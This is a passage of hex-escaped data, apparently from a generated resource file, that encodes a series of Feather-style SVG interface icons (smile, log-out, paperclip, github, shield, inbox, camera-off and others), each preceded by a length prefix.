\x69\x6e\x74\x73\x3d\x22\x31\x31\x20\x35\x20\x36\x20\x39\x20\x32\
\x20\x39\x20\x32\x20\x31\x35\x20\x36\x20\x31\x35\x20\x31\x31\x20\
\x31\x39\x20\x31\x31\x20\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\
\x6f\x6e\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x35\x2e\
\x35\x34\x20\x38\x2e\x34\x36\x61\x35\x20\x35\x20\x30\x20\x30\x20\
\x31\x20\x30\x20\x37\x2e\x30\x37\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x84\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x6d\x69\x6c\x65\
\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\
\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\x22\
\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x61\x74\x68\x20\
\x64\x3d\x22\x4d\x38\x20\x31\x34\x73\x31\x2e\x35\x20\x32\x20\x34\
\x20\x32\x20\x34\x2d\x32\x20\x34\x2d\x32\x22\x3e\x3c\x2f\x70\x61\
\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x39\x22\x20\
\x79\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x39\x2e\x30\x31\x22\
\x20\x79\x32\x3d\x22\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x35\x22\x20\x79\x31\x3d\
\x22\x39\x22\x20\x78\x32\x3d\x22\x31\x35\x2e\x30\x31\x22\x20\x79\
\x32\x3d\x22\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x01\x6f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6c\x6f\x67\x2d\x6f\
\x75\x74\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x39\x20\
\x32\x31\x48\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\
\x2d\x32\x56\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\
\x2d\x32\x68\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\
\x36\x20\x31\x37\x20\x32\x31\x20\x31\x32\x20\x31\x36\x20\x37\x22\
\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x31\x32\
\x22\x20\x78\x32\x3d\x22\x39\x22\x20\x79\x32\x3d\x22\x31\x32\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x60\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x61\x70\x65\x72\
\x63\x6c\x69\x70\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x32\x31\x2e\x34\x34\x20\x31\x31\x2e\x30\x35\x6c\x2d\x39\x2e\x31\
\x39\x20\x39\x2e\x31\x39\x61\x36\x20\x36\x20\x30\x20\x30\x20\x31\
\x2d\x38\x2e\x34\x39\x2d\x38\x2e\x34\x39\x6c\x39\x2e\x31\x39\x2d\
\x39\x2e\x31\x39\x61\x34\x20\x34\x20\x30\x20\x30\x20\x31\x20\x35\
\x2e\x36\x36\x20\x35\x2e\x36\x36\x6c\x2d\x39\x2e\x32\x20\x39\x2e\
\x31\x39\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2e\x38\
\x33\x2d\x32\x2e\x38\x33\x6c\x38\x2e\x34\x39\x2d\x38\x2e\x34\x38\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3e\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x72\x6e\x65\
\x72\x2d\x72\x69\x67\x68\x74\x2d\x64\x6f\x77\x6e\x22\x3e\x3c\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\
\x31\x30\x20\x31\x35\x20\x31\x35\x20\x32\x30\x20\x32\x30\x20\x31\
\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\
\x61\x74\x68\x20\x64\x3d\x22\x4d\x34\x20\x34\x68\x37\x61\x34\x20\
\x34\x20\x30\x20\x30\x20\x31\x20\x34\x20\x34\x76\x31\x32\x22\x3e\
\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xc0\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x68\x72\x6f\x6d\
\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\
\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\
\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\x69\x72\x63\
\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\
\x32\x22\x20\x72\x3d\x22\x34\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\
\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x31\x2e\x31\
\x37\x22\x20\x79\x31\x3d\x22\x38\x22\x20\x78\x32\x3d\x22\x31\x32\
\x22\x20\x79\x32\x3d\x22\x38\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x33\x2e\x39\x35\x22\x20\
\x79\x31\x3d\x22\x36\x2e\x30\x36\x22\x20\x78\x32\x3d\x22\x38\x2e\
\x35\x34\x22\x20\x79\x32\x3d\x22\x31\x34\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x30\x2e\
\x38\x38\x22\x20\x79\x31\x3d\x22\x32\x31\x2e\x39\x34\x22\x20\x78\
\x32\x3d\x22\x31\x35\x2e\x34\x36\x22\x20\x79\x32\x3d\x22\x31\x34\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x0f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x67\x69\x74\x68\x75\
\x62\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x39\x20\x31\
\x39\x63\x2d\x35\x20\x31\x2e\x35\x2d\x35\x2d\x32\x2e\x35\x2d\x37\
\x2d\x33\x6d\x31\x34\x20\x36\x76\x2d\x33\x2e\x38\x37\x61\x33\x2e\
\x33\x37\x20\x33\x2e\x33\x37\x20\x30\x20\x30\x20\x30\x2d\x2e\x39\
\x34\x2d\x32\x2e\x36\x31\x63\x33\x2e\x31\x34\x2d\x2e\x33\x35\x20\
\x36\x2e\x34\x34\x2d\x31\x2e\x35\x34\x20\x36\x2e\x34\x34\x2d\x37\
\x41\x35\x2e\x34\x34\x20\x35\x2e\x34\x34\x20\x30\x20\x30\x20\x30\
\x20\x32\x30\x20\x34\x2e\x37\x37\x20\x35\x2e\x30\x37\x20\x35\x2e\
\x30\x37\x20\x30\x20\x30\x20\x30\x20\x31\x39\x2e\x39\x31\x20\x31\
\x53\x31\x38\x2e\x37\x33\x2e\x36\x35\x20\x31\x36\x20\x32\x2e\x34\
\x38\x61\x31\x33\x2e\x33\x38\x20\x31\x33\x2e\x33\x38\x20\x30\x20\
\x30\x20\x30\x2d\x37\x20\x30\x43\x36\x2e\x32\x37\x2e\x36\x35\x20\
\x35\x2e\x30\x39\x20\x31\x20\x35\x2e\x30\x39\x20\x31\x41\x35\x2e\
\x30\x37\x20\x35\x2e\x30\x37\x20\x30\x20\x30\x20\x30\x20\x35\x20\
\x34\x2e\x37\x37\x61\x35\x2e\x34\x34\x20\x35\x2e\x34\x34\x20\x30\
\x20\x30\x20\x30\x2d\x31\x2e\x35\x20\x33\x2e\x37\x38\x63\x30\x20\
\x35\x2e\x34\x32\x20\x33\x2e\x33\x20\x36\x2e\x36\x31\x20\x36\x2e\
\x34\x34\x20\x37\x41\x33\x2e\x33\x37\x20\x33\x2e\x33\x37\x20\x30\
\x20\x30\x20\x30\x20\x39\x20\x31\x38\x2e\x31\x33\x56\x32\x32\x22\
\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x17\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x68\x69\x65\x6c\
\x64\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x32\x20\
\x32\x32\x73\x38\x2d\x34\x20\x38\x2d\x31\x30\x56\x35\x6c\x2d\x38\
\x2d\x33\x2d\x38\x20\x33\x76\x37\x63\x30\x20\x36\x20\x38\x20\x31\
\x30\x20\x38\x20\x31\x30\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x1a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x7a\x61\x70\x22\x3e\
\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\x74\x73\x3d\
\x22\x31\x33\x20\x32\x20\x33\x20\x31\x34\x20\x31\x32\x20\x31\x34\
\x20\x31\x31\x20\x32\x32\x20\x32\x31\x20\x31\x30\x20\x31\x32\x20\
\x31\x30\x20\x31\x33\x20\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\
\x6f\x6e\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x6d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x75\x73\x65\x72\x2d\
\x6d\x69\x6e\x75\x73\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x31\x36\x20\x32\x31\x76\x2d\x32\x61\x34\x20\x34\x20\x30\x20\
\x30\x20\x30\x2d\x34\x2d\x34\x48\x35\x61\x34\x20\x34\x20\x30\x20\
\x30\x20\x30\x2d\x34\x20\x34\x76\x32\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x38\x2e\
\x35\x22\x20\x63\x79\x3d\x22\x37\x22\x20\x72\x3d\x22\x34\x22\x3e\
\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x32\x33\x22\x20\x79\x31\x3d\x22\x31\x31\x22\x20\x78\
\x32\x3d\x22\x31\x37\x22\x20\x79\x32\x3d\x22\x31\x31\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x95\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x69\x6e\x62\x6f\x78\
\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\
\x74\x73\x3d\x22\x32\x32\x20\x31\x32\x20\x31\x36\x20\x31\x32\x20\
\x31\x34\x20\x31\x35\x20\x31\x30\x20\x31\x35\x20\x38\x20\x31\x32\
\x20\x32\x20\x31\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x35\x2e\x34\x35\
\x20\x35\x2e\x31\x31\x4c\x32\x20\x31\x32\x76\x36\x61\x32\x20\x32\
\x20\x30\x20\x30\x20\x30\x20\x32\x20\x32\x68\x31\x36\x61\x32\x20\
\x32\x20\x30\x20\x30\x20\x30\x20\x32\x2d\x32\x76\x2d\x36\x6c\x2d\
\x33\x2e\x34\x35\x2d\x36\x2e\x38\x39\x41\x32\x20\x32\x20\x30\x20\
\x30\x20\x30\x20\x31\x36\x2e\x37\x36\x20\x34\x48\x37\x2e\x32\x34\
\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x2d\x31\x2e\x37\x39\x20\
\x31\x2e\x31\x31\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x81\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x61\x6d\x65\x72\
\x61\x2d\x6f\x66\x66\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x31\x22\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\x3d\x22\x32\
\x33\x22\x20\x79\x32\x3d\x22\x32\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x31\x20\x32\
\x31\x48\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\
\x32\x56\x38\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2d\
\x32\x68\x33\x6d\x33\x2d\x33\x68\x36\x6c\x32\x20\x33\x68\x34\x61\
\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\x32\x76\x39\x2e\
\x33\x34\x6d\x2d\x37\x2e\x37\x32\x2d\x32\x2e\x30\x36\x61\x34\x20\
\x34\x20\x30\x20\x31\x20\x31\x2d\x35\x2e\x35\x36\x2d\x35\x2e\x35\
\x36\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\
\x00\x00\x01\x69\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
